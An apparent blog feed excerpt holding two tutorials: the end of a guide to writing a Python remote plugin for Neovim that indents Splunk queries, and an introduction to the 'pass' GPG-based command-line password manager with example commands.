<p>And then...</p> <p>What about making it a Neovim plugin? As Neovim has a python interface, it should work right? Spoiler: yes. </p> <p>Let's dive in!</p> <h2> Writing a plugin </h2> <p>First, we need to set a couple of things up. Python binaries must be in your shell PATH (you can check that with <code>:checkhealth</code>). </p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fkjp4wek69inmz6psim64.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fkjp4wek69inmz6psim64.png" alt="Screenshot of the result of :checkhealth"></a></p> <p>As you can see here, the python binaries are missing from the PATH and Neovim cannot run anything with it. So let's add those lines in our <code>init.vim</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>let g:python3_host_prog = '/usr/bin/python3' let g:python_host_prog = '/usr/bin/python2' </code></pre> </div> <p>Alternatively you could add the binaries to you path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">export </span><span class="nv">PATH</span><span class="o">=</span><span class="nv">$PATH</span>:/usr/bin/python:/usr/bin/python3 </code></pre> </div> <p>And check it with <code>echo $PATH</code>.</p> <p>Then check that you have both version of <code>pynvim</code>, the python Neovim library:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python3 -m pip install pynvim python -m pip install pynvim </code></pre> </div> <p>After that we can start setting up our repository and our folders:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># do your git magic here mkdir -p rplugin/python touch rplugin/python/nvim-test.py </code></pre> </div> <p>According to the <a href="https://pynvim.readthedocs.io/en/latest/usage/remote-plugins.html" rel="noopener noreferrer">documentation</a>, remote plugins are the new way to do things so we're going to follow that.</p> <p>Let's look into <code>nvim-test.py</code> and get some inspiration from this <a href="https://github.com/jacobsimpson/nvim-example-python-plugin" rel="noopener noreferrer">Jacob Simpson's example</a>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pynvim</span> <span class="nd">@pynvim.plugin</span> <span class="k">class</span> <span class="nc">TestPlugin</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">_init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">nvim</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span> <span class="o">=</span> <span class="n">nvim</span> <span class="nd">@pynvim.function</span><span class="p">(</span><span class="sh">"</span><span class="s">TestFunction</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">testFunction</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">args</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span><span class="p">.</span><span class="n">current</span><span class="p">.</span><span class="n">line</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Hello from your plugin!</span><span class="sh">"</span> </code></pre> </div> <p>Breaking up the code:</p> <ul> <li>We initialize the class and the subclass <code>nvim</code> </li> <li>We create a function that will overwrite the current line</li> </ul> <p>To test this, you could update your plugin on a git instance and update the plugins form your <code>init.vim</code>. But... you could also use a test <code>vimrc</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"let &amp;runtimepath.=','.escape(expand('&lt;sfile&gt;:p:h'), '</span><span class="se">\,</span><span class="s2">')"</span> <span class="o">&gt;</span> testvimrc </code></pre> </div> <p>Now start <code>nvim -u testvimrc</code> and run <code>:UpdateRemotePlugins</code> this will register you plugin as a remote plugin and generate the manifest. Check that with: <code>cat ~/.local/share/nvim/rplugin.vim</code>, the file should not be empty and you should see your plugin there. </p> <p>Now, running <em>after reloading Neovim</em>, <code>:call TestFunction()</code> should normally work and you can test your work. I think that so far you need to reboot Neovim every time you update the remove plugins, but maybe there's a way to bypass that.</p> <p>Now for the work I did:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">re</span> <span class="kn">import</span> <span class="n">pynvim</span> <span class="nd">@pynvim.plugin</span> <span class="k">class</span> <span class="nc">SplunkLinter</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">nvim</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span> <span class="o">=</span> <span class="n">nvim</span> <span class="nd">@pynvim.function</span><span class="p">(</span><span class="sh">"</span><span class="s">LintSplunk</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">lintSplunk</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">args</span><span class="p">):</span> <span class="n">current_line</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span><span class="p">.</span><span class="n">current</span><span class="p">.</span><span class="n">line</span> <span class="n">front</span> <span class="o">=</span> <span class="n">current_line</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">(</span><span class="sh">"</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">res</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">front</span><span class="p">:</span> <span class="n">p</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">if</span> <span class="n">j</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span> <span class="n">p</span> <span class="o">=</span> <span class="sh">"</span><span class="s">(</span><span class="sh">"</span> <span class="n">back</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">findall</span><span class="p">(</span><span class="sh">"</span><span class="s">\)</span><span class="sh">"</span><span class="p">,</span> <span class="n">line</span><span class="p">)</span> <span class="n">line</span> <span class="o">=</span> <span class="p">((</span><span class="n">i</span><span class="p">)</span> <span class="o">*</span> <span class="sh">"</span><span class="se">\t</span><span class="sh">"</span><span class="p">)</span> <span class="o">+</span> <span class="n">p</span> <span class="o">+</span> <span class="n">line</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span><span class="p">.</span><span class="n">current</span><span class="p">.</span><span class="nb">buffer</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">back</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span> <span class="k">elif</span> <span class="nf">len</span><span class="p">(</span><span class="n">back</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">:</span> <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">back</span><span class="p">)</span> <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">j</span> <span class="o">=</span> <span class="n">j</span> <span class="o">+</span> <span class="mi">1</span> <span class="n">self</span><span class="p">.</span><span class="n">nvim</span><span class="p">.</span><span class="n">current</span><span class="p">.</span><span class="n">line</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">return</span> </code></pre> </div> <p>Before you say anything, I know this can be improved. Basically this code is going to indent a string based on the level of parenthesizes that it contains. It's basically what I need and it does the job!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>test (on) (one) (one (two (three))) (one) ((two)) # to test (on) (one) (one (two (three))) (one) ( (two)) </code></pre> </div> <p>The Github repo is here: <a href="https://github.com/christalib/nvim-splunk-linter" rel="noopener noreferrer">https://github.com/christalib/nvim-splunk-linter</a>, feel free to open issues, PR's and such!</p> <p>Have you already developed a plugin for Neovim or Vim? How did you do it?</p> vim todayilearned tutorial chris Wed, 02 Dec 2020 10:52:54 +0000 https://dev.to/evilcel3ri/pass-the-simple-cli-password-manager-3e8k https://dev.to/evilcel3ri/pass-the-simple-cli-password-manager-3e8k <p>Do you use a password manager? If not, you should. But which one should you choose? There are a lot out there and a lot of good free ones such as the Keepass (X, XC etc.) or paying versions such as LastPass (<em>edit: free for individuals</em>) or OnePassword. This WIRED <a href="https://www.wired.com/story/best-password-managers/">article</a> lists some for you. </p> <p>Today, I'd like to talk about a really cool, simple, perfect for the CLI dwellers like us, password manager: <a href="https://www.passwordstore.org/">pass</a></p> <h1> Less is more </h1> <p>Pass is a CLI password manager, this means that unless you use one of the <a href="https://www.passwordstore.org/#other">available</a> interfaces, you will only be working in your terminal. </p> <p>Pass works by using a GPG key to encrypt each passwords and stores the results in a Git repository. This means that backups are insanely easy: <code>git push origin main</code> and that's it!</p> <p>In the past years, I have been using Keepass and KeepassXC a lot. I did like the way they worked but I was sometimes annoyed to keep a window open all the time for my passwords. Also, used to break my computers very often, I lost a certain amount of passwords over the time. </p> <p>Pass has the usability of any CLI tool and uses the basics of Bash <a href="https://git.zx2c4.com/password-store/about/#COMMANDS">commands</a> to manage your passwords. It's a dead simple encrypted folder and I have to say that is all I need. </p> <h1> Demo </h1> <p>The demo was made on a Linux with <a href="https://www.gnupg.org/documentation/manuals/gnupg/Invoking-GPG_002dAGENT.html">gpg-agent</a> installed.</p> <p>You would initialize your password repo like this (default location: <code>~/.password-store</code>):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass init yourgpgkeyID@securethings.com </code></pre> </div> <p>Then, after signing up for your favorite online service, you can generate or insert a new password:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass insert <span class="c"># then type your password</span> pass generate <span class="nt">-c</span> Newsletters/awesomeThing 32 <span class="c"># to generate a 32 random password and copy it to the clipboard</span> </code></pre> </div> <p>After, a couple of days later you can search for your password:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass search awesomeThing <span class="c"># and when you found the folder then:</span> pass <span class="nt">-c</span> Newsletters/awesomeThing <span class="c"># here you will need to decrypt your GPG key</span> </code></pre> </div> <p>Now let's say you want to back all of this on a private Git repo (Github, Gitea, Gitlab...):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass git remote add origin URL pass git push </code></pre> </div> <p>Each pass command will run the <code>add</code> and <code>commit</code> for you, so you will only have to <code>push</code> to your repo. </p> <p><em>Keep in mind that your GPG key is not backed up with your repo. You need to do to that separately.</em></p> <p>Do you need to remove a password?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass <span class="nb">rm </span>Newsletters/awesomeThing </code></pre> </div> <p>Do you need to move a password?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass <span class="nb">mv </span>Newsletters/awesomeThing Videos/awesomeThing </code></pre> </div> <p>You can also <code>edit</code>, <code>show</code> and <code>cp</code> the passwords. </p> <p>Ready to make the move? Check out those <a href="https://www.passwordstore.org/#other">import scripts</a> on the official website!</p> <p>Are you ready to use pass? What's your favorite password manager?</p> tooling tutorial security